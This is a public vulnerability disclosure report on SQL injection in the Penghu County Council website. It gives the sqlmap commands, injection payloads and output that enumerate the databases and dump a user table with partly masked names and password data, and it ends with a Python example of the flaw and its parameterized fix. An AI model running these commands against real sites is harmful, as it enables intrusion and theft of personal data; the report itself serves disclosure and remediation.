Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2024-00630
- Vendor: Penghu County Council (澎湖縣議會)
- Title: The phcouncil website has a SQL Injection vulnerability
- Introduction: A government agency website has a SQL Injection vulnerability
Handling Status
- Current status: Public
- Last update: 2024/08/02
- Workflow: New submission → Reviewed → Reported → Patch status not reported → Not retested → Public
Handling History
- 2024/06/02 19:33:40 : New submission (status updated by ChaosFractal)
- 2024/06/02 19:40:15 : New submission (status updated by ChaosFractal)
- 2024/06/02 19:49:10 : New submission (status updated by ChaosFractal)
- 2024/06/02 19:49:38 : New submission (status updated by ChaosFractal)
- 2024/06/02 19:50:07 : New submission (status updated by ChaosFractal)
- 2024/06/06 14:57:10 : Review completed (status updated by the HITCON ZeroDay service team)
- 2024/06/12 18:29:23 : Review completed (status updated by the HITCON ZeroDay service team)
- 2024/06/12 18:29:23 : Patching in progress (status updated by the HITCON ZeroDay service team)
- 2024/08/02 03:00:03 : Public (updated automatically by the HITCON ZeroDay platform)
Details
- ZDID: ZD-2024-00630
- Reporter: ChaosFractal (ChaosFractal)
- Risk: Critical
- Type: Database injection attack (SQL Injection)
References
An attacker can exploit this vulnerability to gain access to the back-end database and its complete contents (including large amounts of users' personal or sensitive data), and may also be able to destroy or modify that data.
Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
Protection: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(This field is generated automatically by the system from the vulnerability category and serves as reference material.)
Related URL
http://www.phcouncil.gov.tw/show/board.php?no=B06050001
Description
Vulnerability type: SQL Injection
Steps to reproduce:
Tested with the sqlmap tool
1. A basic test found SQL Injection
Command:
> sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001"
Result:
[10:30:05] [INFO] resuming back-end DBMS 'mysql'
[10:30:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: no=B06050001' AND 2308=2308 AND 'uWGU'='uWGU
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: no=B06050001' AND (SELECT 6523 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(6523=6523,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'enHZ'='enHZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: no=B06050001' AND (SELECT 1494 FROM (SELECT(SLEEP(5)))bMjD) AND 'XrRi'='XrRi
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: no=-3934' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b706b71,0x7972676d444158626f685669654a6b79617668787561555376794c777675636d636b4e4344797644,0x716b706a71),NULL#
---
[10:30:06] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
2. Attempted to enumerate the databases; found the database phcouncil
Command:
> sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001" --dbms=mysql --technique=BETU --level=5 --risk=2 --batch --random-agent --tamper=space2comment,space2hash --dbs
Result:
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phcouncil
[*] phpmyadmin
[*] test
3. Attempted to list the tables in the phcouncil database
Command:
> sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001" --dbms=mysql --technique=BETU --level=5 --risk=2 --batch --random-agent --tamper=space2comment,space2hash --dbs --fingerprint -D "phcouncil" --tables
Result:
Database: phcouncil
[37 tables]
+-------------------+
| system_user |
| cdb_activity1 |
| cdb_activity2 |
| cdb_board |
| cdb_bulletin |
| cdb_chairman |
| cdb_councildata1 |
| cdb_councildata2 |
| cdb_councilgov |
| cdb_countygov |
| cdb_form |
| cdb_forum_data |
| cdb_forum_reply |
| cdb_history |
| cdb_law |
| cdb_law_title |
| cdb_meet |
| cdb_meet_title |
| cdb_message |
| cdb_message2 |
| cdb_mop |
| cdb_newlawdyn1 |
| cdb_newlawdyn2 |
| cdb_petition |
| cdb_phdata1 |
| cdb_phdata2 |
| cdb_provisional |
| cdb_record1 |
| cdb_record2 |
| cdb_schedule |
| cdb_video |
| cdb_website |
| system_autonum |
| system_department |
| system_menu |
| system_parameter |
| system_session |
+-------------------+
4. Attempted to retrieve the columns of the system_user table
Command:
> sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001" --dbms=mysql --technique=BETU --level=5 --risk=2 --batch --random-agent --tamper=space2comment,space2hash --dbs --fingerprint -D "phcouncil" -T "system_user" --columns
Result:
Database: phcouncil
Table: system_user
[7 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| user | varchar(16) |
| ann_permit | tinyint(4) |
| department | int(11) |
| fullname | varchar(20) |
| memo | text |
| password | blob |
| permit | text |
+------------+-------------+
5. Attempted to retrieve the contents of the system_user table
Command:
> sqlmap -u "http://www.phcouncil.gov.tw/show/board.php?no=B06050001" --dbms=mysql --technique=BETU --level=5 --risk=2 --batch --random-agent --tamper=space2comment,space2hash --dbs --fingerprint -D "phcouncil" -T "system_user" --dump
Result:
Database: phcouncil
Table: system_user
[7 entries]
+---------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+------------------------------+------------+------------+
| memo | user | permit | fullname | password | ann_permit | department |
+---------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+------------------------------+------------+------------+
| <blank> | l****i | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,34,8,35,8,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,38,0,22,0,23,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0,39,0,40,0 | 系O員 | ??bZٖ**********?7x | 1 | 9 |
| <blank> | x1****2 | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,34,8,35,8,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,38,0,22,0,23,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0,39,0,40,0 | 啟O員 | ??**********?W( | 0 | 9 |
| <blank> | c****u | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,34,8,35,8,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,22,0,23,0,38,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0,39,40 | 系O者 | ????**********1?? | 0 | 9 |
| <blank> | x1****3 | 37,0,10,0,10,11,0,12,0,17,12,22,0,23,0 | 莊O州 | ?\\I**********eC? | 0 | 4 |
| <blank> | X1****77 | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,22,0,23,0,38,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0 | 楊O銘 | 54?u**********?J? | 0 | 1 |
| <blank> | su****13 | 1,0,11,0 | 陳O珊 | ??wK\*************3~? | 0 | 5 |
| <blank> | we****5 | 1,0,2,1,3,1,4,1,5,1,37,0,8,0,34,8,35,8,36,8,9,0,10,0,11,0,12,0,17,12,13,0,16,13,14,0,15,0,19,0,38,0,22,0,23,0,24,0,25,24,26,24,29,24,30,24,31,0,32,0,33,0,39,0,40,0 | 王O衛 | 4}?**********\x14 | 1 | 9 |
+---------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+------------------------------+------------+------------+
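The defect behind steps 1 to 5 and its fix, as an added example that is not part of the report or the phcouncil site's code: the `no` parameter, the value B06050001 and the boolean-based payload are taken from the sqlmap output above, while the table name, column names and the assumed board-number format are constructed for the demonstration.

```python
import re
import sqlite3

# Constructed stand-in for the lookup behind board.php?no=... .
# Table and column names are assumptions; only the "no" parameter and
# the value B06050001 come from the report.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cdb_board (no TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO cdb_board VALUES (?, ?)",
        [("B06050001", "Public notice"), ("B06050002", "Internal memo")],
    )
    return conn

def lookup_vulnerable(conn, no):
    # The bug class the report describes: untrusted input spliced into the
    # SQL text, so a quote in "no" changes the structure of the WHERE clause.
    sql = "SELECT no, title FROM cdb_board WHERE no='" + no + "'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, no):
    # Fix: bind the value as a parameter. Whatever "no" contains is compared
    # as one opaque string and can never become SQL syntax.
    return conn.execute(
        "SELECT no, title FROM cdb_board WHERE no=?", (no,)
    ).fetchall()

# Assumed format for board numbers, based on the sample value B06050001.
NO_FORMAT = re.compile(r"^[A-Z][0-9]{8}$")

def is_valid_no(no):
    return NO_FORMAT.match(no) is not None

def lookup_hardened(conn, no):
    # Defence in depth: reject malformed identifiers before touching the
    # database, then still use the parameterized query.
    if not is_valid_no(no):
        return []
    return lookup_parameterized(conn, no)

# The boolean-based payload sqlmap reported for the "no" parameter (verbatim
# from the report). Against the vulnerable query it evaluates to true and
# returns the B06050001 row; against the fixed queries it matches nothing.
BOOLEAN_PAYLOAD = "B06050001' AND 2308=2308 AND 'uWGU'='uWGU"
```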
Impact:
Confidentiality is compromised: the entire database is exposed.
If an attacker chooses to attempt modifications, integrity and availability could also be affected.